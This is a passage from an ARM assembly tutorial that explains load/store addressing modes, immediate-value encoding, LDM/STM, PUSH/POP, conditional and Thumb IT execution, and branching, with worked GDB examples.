    In GDB (with gef) we set a break point at _start and run the program.

    gef> break _start
    gef> run
    ...
    gef> nexti 3     /* to run the next 3 instructions */

    The registers on my system are now filled with the following values (keep in mind that these addresses might be different on your system):

    $r0 : 0x00010098 -> 0x00000003
    $r1 : 0x0001009c -> 0x00000004
    $r2 : 0x00000003
    $r3 : 0x00000000
    $r4 : 0x00000000
    $r5 : 0x00000000
    $r6 : 0x00000000
    $r7 : 0x00000000
    $r8 : 0x00000000
    $r9 : 0x00000000
    $r10 : 0x00000000
    $r11 : 0x00000000
    $r12 : 0x00000000
    $sp : 0xbefff7e0 -> 0x00000001
    $lr : 0x00000000
    $pc : 0x00010080 -> <_start+12> str r2, [r1]
    $cpsr : 0x00000010

    The next instruction that will be executed a STR operation with the offset address mode. It will store the value from R2 (0x00000003) to the memory address specified in R1 (0x0001009c) + the offset (#2) = 0x1009e.

    gef> nexti
    gef> x/w 0x1009e 
    0x1009e <var2+2>: 0x3

    The next STR operation uses the pre-indexed address mode. You can recognize this mode by the exclamation mark (!). The only difference is that the base register will be updated with the final memory address in which the value of R2 will be stored. This means, we store the value found in R2 (0x3) to the memory address specified in R1 (0x1009c) + the offset (#4) = 0x100A0, and update R1 with this exact address.

    gef> nexti
    gef> x/w 0x100A0
    0x100a0: 0x3
    gef> info register r1
    r1     0x100a0     65696

    The last LDR operation uses the post-indexed address mode. This means that the base register (R1) is used as the final address, then updated with the offset calculated with R1+4. In other words, it takes the value found in R1 (not R1+4), which is 0x100A0 and loads it into R3, then updates R1 to R1 (0x100A0) + offset (#4) =  0x100a4.

    gef> info register r1
    r1      0x100a4   65700
    gef> info register r3
    r3      0x3       3

    Here is an abstract illustration of what’s happening:

    2. Offset form: Register as the offset.

    STR    Ra, [Rb, Rc]
    LDR    Ra, [Rb, Rc]

    This offset form uses a register as an offset. An example usage of this offset form is when your code wants to access an array where the index is computed at run-time.

    .data
    var1: .word 3
    var2: .word 4
    
    .text
    .global _start
    
    _start:
        ldr r0, adr_var1  @ load the memory address of var1 via label adr_var1 to R0 
        ldr r1, adr_var2  @ load the memory address of var2 via label adr_var2 to R1 
        ldr r2, [r0]      @ load the value (0x03) at memory address found in R0 to R2
        str r2, [r1, r2]  @ address mode: offset. Store the value found in R2 (0x03) to the memory address found in R1 with the offset R2 (0x03). Base register unmodified.   
        str r2, [r1, r2]! @ address mode: pre-indexed. Store value found in R2 (0x03) to the memory address found in R1 with the offset R2 (0x03). Base register modified: R1 = R1+R2. 
        ldr r3, [r1], r2  @ address mode: post-indexed. Load value at memory address found in R1 to register R3. Then modify base register: R1 = R1+R2.
        bx lr
    
    adr_var1: .word var1
    adr_var2: .word var2

    After executing the first STR operation with the offset address mode, the value of R2 (0x00000003) will be stored at memory address 0x0001009c + 0x00000003 = 0x0001009F.

    gef> x/w 0x0001009F
     0x1009f <var2+3>: 0x00000003

    The second STR operation with the pre-indexed address mode will do the same, with the difference that it will update the base register (R1) with the calculated memory address (R1+R2).

    gef> info register r1
     r1     0x1009f      65695

    The last LDR operation uses the post-indexed address mode and loads the value at the memory address found in R1 into the register R2, then updates the base register R1 (R1+R2 = 0x1009f + 0x3 = 0x100a2).

    gef> info register r1
     r1      0x100a2     65698
    gef> info register r3
     r3      0x3       3

    3. Offset form: Scaled register as the offset

    LDR    Ra, [Rb, Rc, <shifter>]
    STR    Ra, [Rb, Rc, <shifter>]

    The third offset form has a scaled register as the offset. In this case, Rb is the base register and Rc is an immediate offset (or a register containing an immediate value) left/right shifted (<shifter>) to scale the immediate. This means that the barrel shifter is used to scale the offset. An example usage of this offset form would be for loops to iterate over an array. Here is a simple example you can run in GDB:

    .data
    var1: .word 3
    var2: .word 4
    
    .text
    .global _start
    
    _start:
        ldr r0, adr_var1         @ load the memory address of var1 via label adr_var1 to R0
        ldr r1, adr_var2         @ load the memory address of var2 via label adr_var2 to R1
        ldr r2, [r0]             @ load the value (0x03) at memory address found in R0 to R2
        str r2, [r1, r2, LSL#2]  @ address mode: offset. Store the value found in R2 (0x03) to the memory address found in R1 with the offset R2 left-shifted by 2. Base register (R1) unmodified.
        str r2, [r1, r2, LSL#2]! @ address mode: pre-indexed. Store the value found in R2 (0x03) to the memory address found in R1 with the offset R2 left-shifted by 2. Base register modified: R1 = R1 + R2<<2
        ldr r3, [r1], r2, LSL#2  @ address mode: post-indexed. Load value at memory address found in R1 to the register R3. Then modifiy base register: R1 = R1 + R2<<2
        bkpt
    
    adr_var1: .word var1
    adr_var2: .word var2

    The first STR operation uses the offset address mode and stores the value found in R2 at the memory location calculated from [r1, r2, LSL#2], which means that it takes the value in R1 as a base (in this case, R1 contains the memory address of var2), then it takes the value in R2 (0x3), and shifts it left by 2. The picture below is an attempt to visualize how the memory location is calculated with [r1, r2, LSL#2].

    The second STR operation uses the pre-indexed address mode. This means, it performs the same action as the previous operation, with the difference that it updates the base register R1 with the calculated memory address afterwards. In other words, it will first store the value found at the memory address R1 (0x1009c) + the offset left shifted by #2 (0x03 LSL#2 = 0xC) = 0x100a8, and update R1 with 0x100a8.

    gef> info register r1
    r1      0x100a8      65704

    The last LDR operation uses the post-indexed address mode. This means, it loads the value at the memory address found in R1 (0x100a8) into register R3, then updates the base register R1 with the value calculated with r2, LSL#2. In other words, R1 gets updated with the value R1 (0x100a8) + the offset R2 (0x3) left shifted by #2 (0xC) = 0x100b4.

    gef> info register r1
    r1      0x100b4      65716

    Summary

    Remember the three offset modes in LDR/STR:

    1. offset mode uses an immediate as offset
      • ldr   r3, [r1, #4]
    2. offset mode uses a register as offset
      • ldr   r3, [r1, r2]
    3. offset mode uses a scaled register as offset
      • ldr   r3, [r1, r2, LSL#2]

    How to remember the different address modes in LDR/STR:

    • If there is a !, it’s prefix address mode
      • ldr   r3, [r1, #4]!
      • ldr   r3, [r1, r2]!
      • ldr   r3, [r1, r2, LSL#2]!
    • If the base register is in brackets by itself, it’s postfix address mode
      • ldr   r3, [r1], #4
      • ldr   r3, [r1], r2
      • ldr   r3, [r1], r2, LSL#2
    • Anything else is offset address mode.
      • ldr   r3, [r1, #4]
      • ldr   r3, [r1, r2]
      • ldr   r3, [r1, r2, LSL#2]
    LDR FOR PC-RELATIVE ADDRESSING

    LDR is not only used to load data from memory into a register. Sometimes you will see syntax like this:

    .section .text
    .global _start
    
    _start:
       ldr r0, =jump        /* load the address of the function label jump into R0 */
       ldr r1, =0x68DB00AD  /* load the value 0x68DB00AD into R1 */
    jump:
       ldr r2, =511         /* load the value 511 into R2 */ 
       bkpt

    These instructions are technically called pseudo-instructions. We can use this syntax to reference data in the literal pool. The literal pool is a memory area in the same section (because the literal pool is part of the code) to store constants, strings, or offsets. In the example above we use these pseudo-instructions to reference an offset to a function, and to move a 32-bit constant into a register in one instruction. The reason why we sometimes need to use this syntax to move a 32-bit constant into a register in one instruction is because ARM can only load a 8-bit value in one go. What? To understand why, you need to know how immediate values are being handled on ARM.

    USING IMMEDIATE VALUES ON ARM

    Loading immediate values in a register on ARM is not as straightforward as it is on x86. There are restrictions on which immediate values you can use. What these restrictions are and how to deal with them isn’t the most exciting part of ARM assembly, but bear with me, this is just for your understanding and there are tricks you can use to bypass these restrictions (hint: LDR).

    We know that each ARM instruction is 32bit long, and all instructions are conditional. There are 16 condition codes which we can use and one condition code takes up 4 bits of the instruction. Then we need 2 bits for the destination register. 2 bits for the first operand register, and 1 bit for the set-status flag, plus an assorted number of bits for other matters like the actual opcodes. The point here is, that after assigning bits to instruction-type, registers, and other fields, there are only 12 bits left for immediate values, which will only allow for 4096 different values.

    This means that the ARM instruction is only able to use a limited range of immediate values with MOV directly.  If a number can’t be used directly, it must be split into parts and pieced together from multiple smaller numbers.

    But there is more. Instead of taking the 12 bits for a single integer, those 12 bits are split into an 8bit number (n) being able to load any 8-bit value in the range of 0-255, and a 4bit rotation field (r) being a right rotate in steps of 2 between 0 and 30. This means that the full immediate value v is given by the formula: v = n ror 2*r. In other words, the only valid immediate values are rotated bytes (values that can be reduced to a byte rotated by an even number).

    Here are some examples of valid and invalid immediate values:

    Valid values:
    #256        // 1 ror 24 --> 256
    #384        // 6 ror 26 --> 384
    #484        // 121 ror 30 --> 484
    #16384      // 1 ror 18 --> 16384
    #2030043136 // 121 ror 8 --> 2030043136
    #0x06000000 // 6 ror 8 --> 100663296 (0x06000000 in hex)
    
    Invalid values:
    #370        // 185 ror 31 --> 31 is not in range (0 – 30)
    #511        // 1 1111 1111 --> bit-pattern can’t fit into one byte
    #0x06010000 // 1 1000 0001.. --> bit-pattern can’t fit into one byte

    This has the consequence that it is not possible to load a full 32bit address in one go. We can bypass this restrictions by using one of the following two options:

    1. Construct a larger value out of smaller parts
      1. Instead of using MOV  r0, #511
      2. Split 511 into two parts: MOV r0, #256, and ADD r0, #255
    2. Use a load construct ‘ldr r1,=value’ which the assembler will happily convert into a MOV, or a PC-relative load if that is not possible.
      1. LDR r1, =511

    If you try to load an invalid immediate value the assembler will complain and output an error saying: Error: invalid constant. If you encounter this error, you now know what it means and what to do about it.
    Let’s say you want to load #511 into R0.

    .section .text
    .global _start
    
    _start:
        mov     r0, #511
        bkpt

    If you try to assemble this code, the assembler will throw an error:

    azeria@labs:~$ as test.s -o test.o
    test.s: Assembler messages:
    test.s:5: Error: invalid constant (1ff) after fixup

    You need to either split 511 in multiple parts or you use LDR as I described before.

    .section .text
    .global _start
    
    _start:
     mov r0, #256   /* 1 ror 24 = 256, so it's valid */
     add r0, #255   /* 255 ror 0 = 255, valid. r0 = 256 + 255 = 511 */
     ldr r1, =511   /* load 511 from the literal pool using LDR */
     bkpt

    If you need to figure out if a certain number can be used as a valid immediate value, you don’t need to calculate it yourself. You can use my little python script called rotator.py which takes your number as an input and tells you if it can be used as a valid immediate number.

    azeria@labs:~$ python rotator.py
    Enter the value you want to check: 511
    
    Sorry, 511 cannot be used as an immediate number and has to be split.
    
    azeria@labs:~$ python rotator.py
    Enter the value you want to check: 256
    
    The number 256 can be used as a valid immediate number.
    1 ror 24 --> 256
    LOAD/STORE MULTIPLE

    Sometimes it is more efficient to load (or store) multiple values at once. For that purpose we use LDM (load multiple) and STM (store multiple). These instructions have variations which basically differ only by the way the initial address is accessed. This is the code we will use in this section. We will go through each instruction step by step.

    .data
    
    array_buff:
     .word 0x00000000             /* array_buff[0] */
     .word 0x00000000             /* array_buff[1] */
     .word 0x00000000             /* array_buff[2]. This element has a relative address of array_buff+8 */
     .word 0x00000000             /* array_buff[3] */
     .word 0x00000000             /* array_buff[4] */
    
    .text
    .global _start
    
    _start:
     adr r0, words+12             /* address of words[3] -> r0 */
     ldr r1, array_buff_bridge    /* address of array_buff[0] -> r1 */
     ldr r2, array_buff_bridge+4  /* address of array_buff[2] -> r2 */
     ldm r0, {r4,r5}              /* words[3] -> r4 = 0x03; words[4] -> r5 = 0x04 */
     stm r1, {r4,r5}              /* r4 -> array_buff[0] = 0x03; r5 -> array_buff[1] = 0x04 */
     ldmia r0, {r4-r6}            /* words[3] -> r4 = 0x03, words[4] -> r5 = 0x04; words[5] -> r6 = 0x05; */
     stmia r1, {r4-r6}            /* r4 -> array_buff[0] = 0x03; r5 -> array_buff[1] = 0x04; r6 -> array_buff[2] = 0x05 */
     ldmib r0, {r4-r6}            /* words[4] -> r4 = 0x04; words[5] -> r5 = 0x05; words[6] -> r6 = 0x06 */
     stmib r1, {r4-r6}            /* r4 -> array_buff[1] = 0x04; r5 -> array_buff[2] = 0x05; r6 -> array_buff[3] = 0x06 */
     ldmda r0, {r4-r6}            /* words[3] -> r6 = 0x03; words[2] -> r5 = 0x02; words[1] -> r4 = 0x01 */
     ldmdb r0, {r4-r6}            /* words[2] -> r6 = 0x02; words[1] -> r5 = 0x01; words[0] -> r4 = 0x00 */
     stmda r2, {r4-r6}            /* r6 -> array_buff[2] = 0x02; r5 -> array_buff[1] = 0x01; r4 -> array_buff[0] = 0x00 */
     stmdb r2, {r4-r5}            /* r5 -> array_buff[1] = 0x01; r4 -> array_buff[0] = 0x00; */
     bx lr
    
    words:
     .word 0x00000000             /* words[0] */
     .word 0x00000001             /* words[1] */
     .word 0x00000002             /* words[2] */
     .word 0x00000003             /* words[3] */
     .word 0x00000004             /* words[4] */
     .word 0x00000005             /* words[5] */
     .word 0x00000006             /* words[6] */
    
    array_buff_bridge:
     .word array_buff             /* address of array_buff, or in other words - array_buff[0] */
     .word array_buff+8           /* address of array_buff[2] */

    Before we start, keep in mind that a .word refers to a data (memory) block of 32 bits = 4 BYTES. This is important for understanding the offsetting. So the program consists of .data section where we allocate an empty array (array_buff) having 5 elements. We will use this as a writable memory location to STORE data. The .text section contains our code with the memory operation instructions and a read-only data pool containing two labels: one for an array having 7 elements, another for “bridging” .text and .data sections so that we can access the array_buff residing in the .data section.

    adr r0, words+12             /* address of words[3] -> r0 */

    We use ADR instruction (lazy approach) to get the address of the 4th (words[3]) element into the R0. We point to the middle of the words array because we will be operating forwards and backwards from there.

    gef> break _start 
    gef> run
    gef> nexti

    R0 now contains the address of word[3], which in this case is 0x80B8. This means, our array starts at the address of word[0]: 0x80AC (0x80B8 –  0xC).

    gef> x/7w 0x00080AC
    0x80ac <words>: 0x00000000 0x00000001 0x00000002 0x00000003
    0x80bc <words+16>: 0x00000004 0x00000005 0x00000006

    We prepare R1 and R2 with the addresses of the first (array_buff[0]) and third (array_buff[2]) elements of the array_buff array. Once the addresses are obtained, we can start operating on them.

    ldr r1, array_buff_bridge    /* address of array_buff[0] -> r1 */
    ldr r2, array_buff_bridge+4  /* address of array_buff[2] -> r2 */

    After executing the two instructions above, R1 and R2 contain the addresses of array_buff[0] and array_buff[2].

    gef> info register r1 r2
    r1      0x100d0     65744
    r2      0x100d8     65752

    The next instruction uses LDM to load two word values from the memory pointed by R0. So because we made R0 point to words[3] element earlier, the words[3] value goes to R4 and the words[4] value goes to R5.

    ldm r0, {r4,r5}              /* words[3] -> r4 = 0x03; words[4] -> r5 = 0x04 */

    We loaded multiple (2 data blocks) with one command, which set R4 = 0x00000003 and R5 = 0x00000004.

    gef> info registers r4 r5
    r4      0x3      3
    r5      0x4      4

    So far so good. Now let’s perform the STM instruction to store multiple values to memory. The STM instruction in our code takes values (0x3 and 0x4) from registers R4 and R5 and stores these values to a memory location specified by R1. We previously set the R1 to point to the first array_buff element so after this operation the array_buff[0] = 0x00000003 and array_buff[1] = 0x00000004. If not specified otherwise, the LDM and STM opperate on a step of a word (32 bits = 4 byte).

    stm r1, {r4,r5}              /* r4 -> array_buff[0] = 0x03; r5 -> array_buff[1] = 0x04 */

    The values 0x3 and 0x4 should now be stored at the memory address 0x100D0 and 0x100D4. The following instruction inspects two words of memory at the address 0x000100D0.

    gef> x/2w 0x000100D0
    0x100d0 <array_buff>:  0x3   0x4

    As mentioned before, LDM and STM have variations. The type of variation is defined by the suffix of the instruction. Suffixes used in the example are: -IA (increase after), -IB (increase before), -DA (decrease after), -DB (decrease before). These variations differ by the way how they access the memory specified by the first operand (the register storing the source or destination address). In practice, LDM is the same as LDMIA, which means that the address for the next element to be loaded is increased after each load. In this way we get a sequential (forward) data loading from the memory address specified by the first operand (register storing the source address).

    ldmia r0, {r4-r6} /* words[3] -> r4 = 0x03, words[4] -> r5 = 0x04; words[5] -> r6 = 0x05; */ 
    stmia r1, {r4-r6} /* r4 -> array_buff[0] = 0x03; r5 -> array_buff[1] = 0x04; r6 -> array_buff[2] = 0x05 */

    After executing the two instructions above, the registers R4-R6 and the memory addresses 0x000100D0, 0x000100D4, and 0x000100D8 contain the values 0x3, 0x4, and 0x5.

    gef> info registers r4 r5 r6
    r4     0x3     3
    r5     0x4     4
    r6     0x5     5
    gef> x/3w 0x000100D0
    0x100d0 <array_buff>: 0x00000003  0x00000004  0x00000005

    The LDMIB instruction first increases the source address by 4 bytes (one word value) and then performs the first load. In this way we still have a sequential (forward) loading of data, but the first element is with a 4 byte offset from the source address. That’s why in our example the first element to be loaded from the memory into the R4 by LDMIB instruction is 0x00000004 (the words[4]) and not the 0x00000003 (words[3]) as pointed by the R0.

    ldmib r0, {r4-r6}            /* words[4] -> r4 = 0x04; words[5] -> r5 = 0x05; words[6] -> r6 = 0x06 */
    stmib r1, {r4-r6}            /* r4 -> array_buff[1] = 0x04; r5 -> array_buff[2] = 0x05; r6 -> array_buff[3] = 0x06 */

    After executing the two instructions above, the registers R4-R6 and the memory addresses 0x100D4, 0x100D8, and 0x100DC contain the values 0x4, 0x5, and 0x6.

    gef> x/3w 0x100D4
    0x100d4 <array_buff+4>: 0x00000004  0x00000005  0x00000006
    gef> info register r4 r5 r6
    r4     0x4    4
    r5     0x5    5
    r6     0x6    6

    When we use the LDMDA instruction everything starts to operate backwards. R0 points to words[3]. When loading starts we move backwards and load the words[3], words[2] and words[1] into R6, R5, R4. Yes, registers are also loaded backwards. So after the instruction finishes R6 = 0x00000003, R5 = 0x00000002, R4 = 0x00000001. The logic here is that we move backwards because we Decrement the source address AFTER each load. The backward registry loading happens because with every load we decrement the memory address and thus decrement the registry number to keep up with the logic that higher memory addresses relate to higher registry number. Check out the LDMIA (or LDM) example, we loaded lower registry first because the source address was lower, and then loaded the higher registry because the source address increased.

    Load multiple, decrement after:

    ldmda r0, {r4-r6} /* words[3] -> r6 = 0x03; words[2] -> r5 = 0x02; words[1] -> r4 = 0x01 */

    Registers R4, R5, and R6 after execution:

    gef> info register r4 r5 r6
    r4     0x1    1
    r5     0x2    2
    r6     0x3    3

    Load multiple, decrement before:

    ldmdb r0, {r4-r6} /* words[2] -> r6 = 0x02; words[1] -> r5 = 0x01; words[0] -> r4 = 0x00 */

    Registers R4, R5, and R6 after execution:

    gef> info register r4 r5 r6
    r4 0x0 0
    r5 0x1 1
    r6 0x2 2

    Store multiple, decrement after.

    stmda r2, {r4-r6} /* r6 -> array_buff[2] = 0x02; r5 -> array_buff[1] = 0x01; r4 -> array_buff[0] = 0x00 */

    Memory addresses of array_buff[2], array_buff[1], and array_buff[0] after execution:

    gef> x/3w 0x100D0
    0x100d0 <array_buff>: 0x00000000 0x00000001 0x00000002

    Store multiple, decrement before:

    stmdb r2, {r4-r5} /* r5 -> array_buff[1] = 0x01; r4 -> array_buff[0] = 0x00; */

    Memory addresses of array_buff[1] and array_buff[0] after execution:

    gef> x/2w 0x100D0
    0x100d0 <array_buff>: 0x00000000 0x00000001
    PUSH AND POP

    There is a memory location within the process called Stack. The Stack Pointer (SP) is a register which, under normal circumstances, will always point to an address wihin the Stack’s memory region. Applications often use Stack for temporary data storage. And As mentioned before, ARM uses a Load/Store model for memory access, which means that the instructions LDR / STR or their derivatives (LDM.. /STM..) are used for memory operations. In x86, we use PUSH and POP to load and store from and onto the Stack. In ARM, we can use these two instructions too:

    When we PUSH something onto the Full Descending stack the following happens:

    1. First, the address in SP gets DECREASED by 4.
    2. Second, information gets stored to the new address pointed by SP.

    When we POP something off the stack, the following happens:

    1. The value at the current SP address is loaded into a certain register,
    2. Address in SP gets INCREASED by 4.

    In the following example we use both PUSH/POP and LDMIA/STMDB:

    .text
    .global _start
    
    _start:
       mov r0, #3
       mov r1, #4
       push {r0, r1}
       pop {r2, r3}
       stmdb sp!, {r0, r1}
       ldmia sp!, {r4, r5}
       bkpt

    Let’s look at the disassembly of this code.

    azeria@labs:~$ as pushpop.s -o pushpop.o
    azeria@labs:~$ ld pushpop.o -o pushpop
    azeria@labs:~$ objdump -D pushpop
    pushpop: file format elf32-littlearm
    
    Disassembly of section .text:
    
    00008054 <_start>:
     8054: e3a00003 mov r0, #3
     8058: e3a01004 mov r1, #4
     805c: e92d0003 push {r0, r1}
     8060: e8bd000c pop {r2, r3}
     8064: e92d0003 push {r0, r1}
     8068: e8bd0030 pop {r4, r5}
     806c: e1200070 bkpt 0x0000

    As you can see, our LDMIA and STMDB instuctions got translated to PUSH and POP. That’s because PUSH is a synonym for STMDB sp!, reglist and POP is a synonym for LDMIA sp! reglist (see ARM Manual)

    Let’s run this code in GDB.

    gef> break _start
    gef> run
    gef> nexti 2
    [...]
    gef> x/w $sp
    0xbefff7e0: 0x00000001

    After running the first two instructions we quickly checked what memory address and value SP points to. The next PUSH instruction should decrease SP by 8, and store the value of R1 and R0 (in that order) onto the Stack.

    gef> nexti
    [...] ----- Stack -----
    0xbefff7d8|+0x00: 0x3 <- $sp
    0xbefff7dc|+0x04: 0x4
    0xbefff7e0|+0x08: 0x1
    [...] 
    gef> x/w $sp
    0xbefff7d8: 0x00000003

    Next, these two values (0x3 and 0x4) are poped off the Stack into the registers, so that R2 = 0x3 and R3 = 0x4. SP is increased by 8:

    gef> nexti
    gef> info register r2 r3
    r2     0x3    3
    r3     0x4    4
    gef> x/w $sp
    0xbefff7e0: 0x00000001
    CONDITIONAL EXECUTION

    We already briefly touched the conditions’ topic while discussing the CPSR register. We use conditions for controlling the program’s flow during it’s runtime usually by making jumps (branches) or executing some instruction only when a condition is met. The condition is described as the state of a specific bit in the CPSR register. Those bits change from time to time based on the outcome of some instructions. For example, when we compare two numbers and they turn out to be equal, we trigger the Zero bit (Z = 1), because under the hood the following happens: a – b = 0. In this case we have EQual condition. If the first number was bigger, we would have a Greater Than condition and in the opposite case – Lower Than. There are more conditions, like Lower or Equal (LE), Greater or Equal (GE) and so on.

    The following table lists the available condition codes, their meanings, and the status of the flags that are tested.

    We can use the following piece of code to look into a practical use case of conditions where we perform conditional addition.

    .global main
    
    main:
            mov     r0, #2     /* setting up initial variable */
            cmp     r0, #3     /* comparing r0 to number 3. Negative bit get's set to 1 */
            addlt   r0, r0, #1 /* increasing r0 IF it was determined that it is smaller (lower than) number 3 */
            cmp     r0, #3     /* comparing r0 to number 3 again. Zero bit gets set to 1. Negative bit is set to 0 */
            addlt   r0, r0, #1 /* increasing r0 IF it was determined that it is smaller (lower than) number 3 */
            bx      lr

    The first CMP instruction in the code above triggers Negative bit to be set (2 – 3 = -1) indicating that the value in r0 is Lower Than number 3. Subsequently, the ADDLT instruction is executed because LT condition is full filled when V != N (values of overflow and negative bits in the CPSR are different). Before we execute second CMP, our r0 = 3. That’s why second CMP clears out Negative bit (because 3 – 3 = 0, no need to set the negative flag) and sets the Zero flag (Z = 1). Now we have V = 0 and N = 0 which results in LT condition to fail. As a result, the second ADDLT is not executed and r0 remains unmodified. The program exits with the result 3.

    CONDITIONAL EXECUTION IN THUMB

    In the Instruction Set chapter we talked about the fact that there are different Thumb versions. Specifically, the Thumb version which allows conditional execution (Thumb-2). Some ARM processor versions support the “IT” instruction that allows up to 4 instructions to be executed conditionally in Thumb state.

    Reference: http://infocenter.arm.com/help/index.jsp?topic=/com.arm.doc.dui0552a/BABIJDIC.html

    Syntax: IT{x{y{z}}} cond

    • cond specifies the condition for the first instruction in the IT block
    • x specifies the condition switch for the second instruction in the IT block
    • y specifies the condition switch for the third instruction in the IT block
    • z specifies the condition switch for the fourth instruction in the IT block

    The structure of the IT instruction is “IF-Then-(Else)” and the syntax is a construct of the two letters T and E:

    • IT refers to If-Then (next instruction is conditional)
    • ITT refers to If-Then-Then (next 2 instructions are conditional)
    • ITE refers to If-Then-Else (next 2 instructions are conditional)
    • ITTE refers to If-Then-Then-Else (next 3 instructions are conditional)
    • ITTEE refers to If-Then-Then-Else-Else (next 4 instructions are conditional)

    Each instruction inside the IT block must specify a condition suffix that is either the same or logical inverse. This means that if you use ITE, the first and second instruction (If-Then) must have the same condition suffix and the third (Else) must have the logical inverse of the first two. Here are some examples from the ARM reference manual which illustrates this logic:

    ITTE   NE           ; Next 3 instructions are conditional
    ANDNE  R0, R0, R1   ; ANDNE does not update condition flags
    ADDSNE R2, R2, #1   ; ADDSNE updates condition flags
    MOVEQ  R2, R3       ; Conditional move
    
    ITE    GT           ; Next 2 instructions are conditional
    ADDGT  R1, R0, #55  ; Conditional addition in case the GT is true
    ADDLE  R1, R0, #48  ; Conditional addition in case the GT is not true
    
    ITTEE  EQ           ; Next 4 instructions are conditional
    MOVEQ  R0, R1       ; Conditional MOV
    ADDEQ  R2, R2, #10  ; Conditional ADD
    ANDNE  R3, R3, #1   ; Conditional AND
    BNE.W  dloop        ; Branch instruction can only be used in the last instruction of an IT block

    Wrong syntax:

    IT     NE           ; Next instruction is conditional     
    ADD    R0, R0, R1   ; Syntax error: no condition code used in IT block.

    Here are the conditional codes and their opposite:

    Let’s try this out with the following example code:

    .syntax unified    @ this is important!
    .text
    .global _start
    
    _start:
        .code 32
        add r3, pc, #1   @ increase value of PC by 1 and add it to R3
        bx r3            @ branch + exchange to the address in R3 -> switch to Thumb state because LSB = 1
    
        .code 16         @ Thumb state
        cmp r0, #10      
        ite eq           @ if R0 is equal 10...
        addeq r1, #2     @ ... then R1 = R1 + 2
        addne r1, #3     @ ... else R1 = R1 + 3
        bkpt

    .code 32

    This example code starts in ARM state. The first instruction adds the address specified in PC plus 1 to R3 and then branches to the address in R3.  This will cause a switch to Thumb state, because the LSB (least significant bit) is 1 and therefore not 4 byte aligned. It’s important to use bx (branch + exchange) for this purpose. After the branch the T (Thumb) flag is set and we are in Thumb state.

    .code 16

    In Thumb state we first compare R0 with #10, which will set the Negative flag (0 – 10 = – 10). Then we use an If-Then-Else block. This block will skip the ADDEQ instruction because the Z (Zero) flag is not set and will execute the ADDNE instruction because the result was NE (not equal) to 10.

    Stepping through this code in GDB will mess up the result, because you would execute both instructions in the ITE block. However running the code in GDB without setting a breakpoint and stepping through each instruction will yield to the correct result setting R1 = 3.

    BRANCHES

    Branches (aka Jumps) allow us to jump to another code segment. This is useful when we need to skip (or repeat) blocks of codes or jump to a specific function. Best examples of such a use case are IFs and Loops. So let’s look into the IF case first.

    .global main
    
    main:
            mov     r1, #2     /* setting up initial variable a */
            mov     r2, #3     /* setting up initial variable b */
            cmp     r1, r2     /* comparing variables to determine which is bigger */
            blt     r1_lower   /* jump to r1_lower in case r2 is bigger (N==1) */
            mov     r0, r1     /* if branching/jumping did not occur, r1 is bigger (or the same) so store r1 into r0 */
            b       end        /* proceed to the end */
    r1_lower:
            mov r0, r2         /* We ended up here because r1 was smaller than r2, so move r2 into r0 */
            b end              /* proceed to the end */
    end:
            bx lr              /* THE END */

    The code above simply checks which of the initial numbers is bigger and returns it as an exit code. A C-like pseudo-code would look like this:

    int main() {
       int max = 0;
       int a = 2;
       int b = 3;
       if(a < b) {
        max = b;
       }
       else {
        max = a;
       }
       return max;
    }

    Now here is how we can use conditional and unconditional branches to create a loop.

    .global main
    
    main:
            mov     r0, #0     /* setting up initial variable a */
    loop:
            cmp     r0, #4     /* checking if a==4 */
            beq     end        /* proceeding to the end if a==4 */
            add     r0, r0, #1 /* increasing a by 1 if the jump to the end did not occur */
            b loop             /* repeating the loop */
    end:
            bx lr              /* THE END */

    A C-like pseudo-code of such a loop would look like this:

    int main() {
       int a = 0;
       while(a < 4) {
       a= a+1;
       }
       return a;
    }

    B / BX / BLX

    There are three types of branching instructions:

    • Branch (B)
      • Simple jump to a function
    • Branch link (BL)
      • Saves (PC+4) in LR and jumps to function
    • Branch exchange (BX) and Branch link exchange (BLX)
      • Same as B/BL + exchange instruction set (ARM <-> Thumb)
      • Needs a register as first operand: BX/BLX reg

    BX/BLX is used to exchange the instruction set from ARM to Thumb.

    .text
    .global _start
    
    _start:
         .code 32         @ ARM mode
         add r2, pc, #1   @ put PC+1 into R2
         bx r2            @ branch + exchange to R2
    
        .code 16          @ Thumb mode
         mov r0, #1

    The trick here is to take the current value of the actual PC, increase it by 1, store the result to a register, and branch (+exchange) to that register. We see that the addition (add r2, pc, #1) will simply take the effective PC address (which is the current PC register’s value + 8 -> 0x805C) and add 1 to it (0x805C + 1 = 0x805D). Then, the exchange happens if the Least Significant Bit (LSB) of the address we branch to is 1 (which is the case, because 0x805D = 10000000 01011101), meaning the address is not 4 byte aligned. Branching to such an address won’t cause any misalignment issues. This is how it would look like in GDB (with GEF extension):

    Please note that the GIF above was created using the older version of GEF so it’s very likely that you see a slightly different UI and different offsets. Nevertheless, the logic is the same.

    Conditional Branches

    Branches can also be executed conditionally and used for branching to a function if a specific condition is met. Let’s look at a very simple example of a conditional branch suing BEQ. This piece of assembly does nothing interesting other than moving values into registers and branching to another function if a register is equal to a specified value. 

    .text
    .global _start
    
    _start:
       mov r0, #2
       mov r1, #2
       add r0, r0, r1
       cmp r0, #4
       beq func1
       add r1, #5
       b func2
    func1:
       mov r1, r0
       bx  lr
    func2:
       mov r0, r1
       bx  lr
    STACK AND FUNCTIONS

    In this part we will look into a special memory region of the process called the Stack. This chapter covers Stack’s purpose and operations related to it. Additionally, we will go through the implementation, types and differences of functions in ARM.

    STACK

    Generally speaking, the Stack is a memory region within the program/process. This part of the memory gets allocated when a process is created. We use Stack for storing temporary data such as local variables of some function, environment variables which helps us to transition between the functions, etc. We interact with the stack using PUSH and POP instructions. As explained in  Memory Instructions: Load And Store PUSH and POP are aliases to some other memory related instructions rather than real instructions, but we use PUSH and POP for simplicity reasons.

    Before we look into a practical example it is import for us to know that the Stack can be implemented in various ways. First, when we say that Stack grows, we mean that an item (32 bits of data) is put on to the Stack. The stack can grow UP (when the stack is implemented in a Descending fashion) or DOWN (when the stack is implemented in a Ascending fashion). The actual location where the next (32 bit) piece of information will be put is defined by the Stack Pointer, or to be precise, the memory address stored in the SP register. Here again, the address could be pointing to the current (last) item in the stack or the next available memory slot for the item. If the SP is currently pointing to the last item in the stack (Full stack implementation) the SP will be decreased (in case of Descending Stack) or increased (in case of Ascending Stack) and only then the item will placed in the Stack. If the SP is currently pointing to the next empty slot in the Stack, the data will be first placed and only then the SP will be decreased (Descending Stack) or increased (Ascending Stack).

     

    As a summary of different Stack implementations we can use the following table which describes which Store Multiple/Load Multiple instructions are used in different cases.

    In our examples we will use the Full descending Stack. Let’s take a quick look into a simple exercise which deals with such a Stack and it’s Stack Pointer.

